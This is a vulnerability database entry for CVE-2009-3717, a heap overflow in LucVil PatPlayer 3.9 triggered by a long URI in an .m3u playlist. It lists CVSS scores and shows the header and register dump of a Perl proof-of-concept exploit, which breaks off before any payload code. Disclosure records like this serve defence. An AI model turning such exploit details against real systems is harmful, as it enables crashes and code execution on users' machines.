9.3
CVSSv2

CVE-2009-3717

Published: 16/10/2009 Updated: 19/09/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Heap-based buffer overflow in LucVil PatPlayer 3.9 allows remote malicious users to cause a denial of service (crash) or execute arbitrary code via a long URI in a playlist (.m3u) file.

Vulnerable Product Search on Vulmon Subscribe to Product

lucvil patplayer 3.9

Exploits

#!/usr/bin/perl # # # # PatPlayer v39 (M3U File) Local Heap Overflow PoC # # # Found By : Cyber-Zone (ABDELKHALEK) # # # Greatz : All friends (Jiko :)) Sec-r1zCoM IQ-TY # # #EAX 41414141 #ECX 00000000 #EDX 004F1FC0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" #EBX 00B928DC #ESP 0012FD2C #EBP 0012FD78 #ESI 004F1CCC ASCII "AAAA ...